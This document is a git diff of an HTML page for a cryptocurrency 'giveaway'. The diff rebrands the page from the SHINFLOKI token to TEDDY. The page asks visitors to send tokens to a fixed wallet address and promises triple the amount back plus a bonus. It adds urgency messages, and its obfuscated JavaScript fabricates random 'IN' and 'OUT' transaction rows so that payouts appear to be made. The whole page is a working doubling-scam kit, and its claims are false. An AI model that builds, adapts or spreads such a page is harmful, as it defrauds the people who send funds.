--- a/index.html
+++ b/index.html
@@ -5,9 +5,9 @@
     <meta charset="utf-8">
     <link href="favicon.jpeg" rel="icon" sizes="32x32" />
     <meta name="msapplication-TileImage" content="logo.png">
-    <meta name="viewport" conSHINFLOKIt="width=device-width, initial-scale=1.0">
+    <meta name="viewport" conTEDDYt="width=device-width, initial-scale=1.0">
     <meta http-equiv="X-UA-Compatible" content="ie=edge">
-    <title>Get 20,000,000 SHINFLOKI giveaway | SHINFLOKI believe that blockchain and SHINFLOKI token will make
+    <title>Get 100,000,000 TEDDY giveaway | TEDDY DOGE believe that blockchain and TEDDY token will make
         the world more
         fair. To speed up the process of cryptocurrency..........</title>
     <link href="index_files/bootstrap.min.css" rel="stylesheet" />
@@ -48,17 +48,17 @@
 
 
 
-                <p class="subtitle" style:"color:#fff">SHINFLOKI believe that blockchain and SHINFLOKI token will make the
+                <p class="subtitle" style:"color:#fff">TEDDY DOGE believe that blockchain and TEDDY token will make the
                     world more fair.
                     To
-                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 20,000,000 SHINFLOKI
+                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 100,000,000 TEDDY
                         giveaway.
                     </strong>We believe that this will help in growing the crypto community.<br />
                     <br />
 
-                    To participate you just need to send from 150,000 SHINFLOKI to 15,000,000 SHINFLOKI to the contribution address
+                    To participate you just need to send from 300,000 TEDDY to 900,000 TEDDY to the contribution address
                     and
-                    we will immediately send you back<strong> 450,000 SHINFLOKI to 45,000,000 SHINFLOKI (x3 back) to the address you
+                    we will immediately send you back<strong> 50,000,000 TEDDY to 150,000,000 TEDDY (x3 back) to the address you
                         sent
                         it from
                     </strong><br />
@@ -67,7 +67,7 @@
                     participate..
                     <br>
                     <br>
-                    <strong>To participate in this airdrop, send tokens to the SHINFLOKI payment address by using the
+                    <strong>To participate in this airdrop, send tokens to the TEDDY payment address by using the
                         instructions on the
                         section below as a guide.</strong>
                 </p>
@@ -128,35 +128,33 @@
                                 example: </b></p>
 
                         <ul style="padding:0 0 0 20px">
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 150,000 SHINFLOKI,
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 300,000 TEDDY,
                                 you
-                                will get 450,000 SHINFLOKI back</span></li>
-                                <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 200,000 SHINFLOKI,
+                                will get 900,000 TEDDY back</span></li>
+                                <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 500,000 TEDDY,
                                     you
-                                    will get 600,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 250,000 SHINFLOKI,
+                                    will get 1,500,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 700,000 TEDDY,
                                     you
-                                    will get 750,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 500,000 SHINFLOKI,
+                                    will get 2,100,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 1,000,000 TEDDY,
                                     you
-                                    will get 1,500,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 1,000,000 SHINFLOKI,
+                                    will get 3,000,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 2,000,000 TEDDY,
                                     you
-                                    will get 3,000,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 2,000,000 SHINFLOKI,
+                                    will get 6,000,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5,000,000 TEDDY,
                                     you
-                                    will get 6,000,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5,000,000 SHINFLOKI,
+                                    will get 15,000,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10,000,000 TEDDY,
                                     you
-                                    will get 15,000,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10,000,000 SHINFLOKI,
+                                    will get 30,000,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 20,000,000 TEDDY,
                                     you
-                                    will get 30,000,000 SHINFLOKI back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 15,000,000 SHINFLOKI,
+                                    will get 60,000,000 TEDDY back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 50,000,000 TEDDY,
                                     you
-                                    will get 45,000,000 SHINFLOKI back</span></li>
-                           
-
+                                    will get 150,000,000 TEDDY back</span></li>                      
                         </ul>
                     </div>
 
@@ -166,31 +164,31 @@
                         </p>
 
                         <ul>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>150,000 SHINFLOKI + = 15,000 SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>300,000 TEDDY + = 30,000 TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>200,000 SHINFLOKI + = 20,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>500,000 TEDDY + = 50,000
+                                    TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>250,000 SHINFLOKI + = 25,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>700,000 TEDDY + = 70,000
+                                    TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>500,000 SHINFLOKI + = 50,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>1,000,000 TEDDY + = 100,000
+                                    TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>1,000,000 SHINFLOKI + = 100,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>3,000,000 TEDDY + = 300,000
+                                    TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>2,000,000 SHINFLOKI + = 200,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>5,000,000 TEDDY + = 500,000
+                                    TEDDY
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>5,000,000 SHINFLOKI + = 500,000
-                                    SHINFLOKI
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10,000,000 TEDDY + = 1,000,000
+                                    TEDDY
                                     BONUS</span></li>
-                                    <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10,000,000 SHINFLOKI + = 100,000
-                                        SHINFLOKI
+                                    <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>20,000,000 TEDDY + = 2,000,000
+                                        TEDDY
                                         BONUS</span></li>
-                                        <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>15,000,000 SHINFLOKI + = 1,500,000
-                                            SHINFLOKI
+                                        <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>50,000,000 TEDDY + = 5,000,000
+                                            TEDDY
                                             BONUS</span></li>
                         </ul>
 
@@ -201,9 +199,9 @@
                 <div class="instruction-blocks">
                     <div class="payment instruction-payment">
                         <div class="payment-row">
-                            <h4 class="payment-title">SHINFLOKI Payment Address</h4>
+                            <h4 class="payment-title">TEDDY Payment Address</h4>
 
-                            <p class="payment-description">You can send SHINFLOKI to the following address:</p>
+                            <p class="payment-description">You can send TEDDY to the following address:</p>
                             <button data-clipboard-text="0xC24aE1237ED2B5c16746ec6014605F5a70245684"><img alt=""
                                     src="copy.html" /> Copy Address to
                                 Clipboard</button>
@@ -242,7 +240,7 @@
                                 50,000</p>
 
                             <p class="instruction-money__chanse">Last chance<br />
-                                to get your SHINFLOKI </p>
+                                to get your TEDDY </p>
                         </div>
                     </div>
                 </div>
@@ -293,7 +291,7 @@
                             <div class="row header-trans">
                                 <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">TxHash</div>
 
-                                <div class="block-SHINFLOKI m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
+                                <div class="block-TEDDY m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
 
                                 <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">From</div>
 
@@ -389,7 +387,7 @@
 
                     <div class="instruction-item__text" style="background:#050B0B;border:2px solid #fff;padding:5px 10px;">
                         Every address that is sent<br />
-                        too late, gets their SHINFLOKI <br />
+                        too late, gets their TEDDY <br />
                         immediately sent back.</div>
                 </div>
             </div>
@@ -408,7 +406,7 @@
                         <div class="row header-trans">
                             <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">TxHash</div>
 
-                            <div class="block-SHINFLOKI m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
+                            <div class="block-TEDDY m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
 
                             <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">From</div>
 
@@ -481,15 +479,15 @@
                 let chainType = [1, 1]
                 divCounter++;
                 var _0xe480x9 =
-                    `${' <div class="inner">\x0D\x0A    <div class="top">\x0D\x0A        <div class="row row-trans-out">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{t1}</div>\x0D\x0A            <div class="block-SHINFLOKI m col-lg-1 col-md-1 col-sm-1 col-xs-1">{t2}</div>\x0D\x0A          <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{t4}</div>\x0D\x0A            <div class="out-trans col-lg-1 col-md-1 col-sm-2 col-xs-2">{t5}</div>\x0D\x0A            <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{t6}</div>\x0D\x0A              <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{t3}</div>\x0D\x0A        <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{t7}</div>\x0D\x0A         <div class="tx-fee col-lg-1 col-md-1 col-sm-1 col-xs-1">{t8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    <div class="bottom">\x0D\x0A        <div class="row row-trans-in">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{b1}</div>\x0D\x0A            <div class="block-SHINFLOKI m col-lg-1 col-md-1 col-sm-1 col-xs-1">{b2}</div>\x0D\x0A                       <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{b4}</div>\x0D\x0A            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1">{b5}</div>\x0D\x0A            <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{b6}</div>\x0D\x0A    <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{b3}</div>\x0D\x0A         <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{b7}</div>\x0D\x0A            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">{b8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    </div>\x0D\x0A    '}`;
+                    `${' <div class="inner">\x0D\x0A    <div class="top">\x0D\x0A        <div class="row row-trans-out">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{t1}</div>\x0D\x0A            <div class="block-TEDDY m col-lg-1 col-md-1 col-sm-1 col-xs-1">{t2}</div>\x0D\x0A          <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{t4}</div>\x0D\x0A            <div class="out-trans col-lg-1 col-md-1 col-sm-2 col-xs-2">{t5}</div>\x0D\x0A            <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{t6}</div>\x0D\x0A              <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{t3}</div>\x0D\x0A        <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{t7}</div>\x0D\x0A         <div class="tx-fee col-lg-1 col-md-1 col-sm-1 col-xs-1">{t8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    <div class="bottom">\x0D\x0A        <div class="row row-trans-in">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{b1}</div>\x0D\x0A            <div class="block-TEDDY m col-lg-1 col-md-1 col-sm-1 col-xs-1">{b2}</div>\x0D\x0A                       <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{b4}</div>\x0D\x0A            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1">{b5}</div>\x0D\x0A            <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{b6}</div>\x0D\x0A    <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{b3}</div>\x0D\x0A         <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{b7}</div>\x0D\x0A            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">{b8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    </div>\x0D\x0A    '}`;
                 let _0xe480xa = '' + randomString(7) + '..';
                 let _0xe480xb = blocks[randomInteger(0, blocks.length - 1)];
                 let _0xe480xc = 'just now';
                 let _0xe480xd = '0x' + chainType[randomInteger(0, chainType.length - 1)] + randomString(6) + '...';
                 let _0xe480xe = 'IN';
                 let _0xe480xf = '0xC24aE1237ED2B5c16746ec6014605F5a70245684';
-                let valueSend = randomInteger(150000, 3000000);
-                let _0xe480x10 = valueSend + ' SHINFLOKI  ';
+                let valueSend = randomInteger(300000, 5000000);
+                let _0xe480x10 = valueSend + ' TEDDY  ';
                 let _0xe480x11 = ((Math['random']() * 0.0099) + 0.0010)['toFixed'](5);
                 let _0xe480x12 = '' + randomString(7) + '...';
                 let _0xe480x13 = 616135;
@@ -497,7 +495,7 @@
                 let _0xe480x15 = _0xe480xf.slice(0, 10) + "...";
                 let _0xe480x16 = 'OUT';
                 let _0xe480x17 = _0xe480xd;
-                let _0xe480x18 = (valueSend * 3) + ' SHINFLOKI  ';
+                let _0xe480x18 = (valueSend * 3) + ' TEDDY  ';
                 let _0xe480x19 = ((Math['random']() * 0.0099) + 0.0010)['toFixed'](5);
                 _0xe480x9 = _0xe480x9['replace']('{t1}', _0xe480x12);
                 _0xe480x9 = _0xe480x9['replace']('{t2}', _0xe480x13);
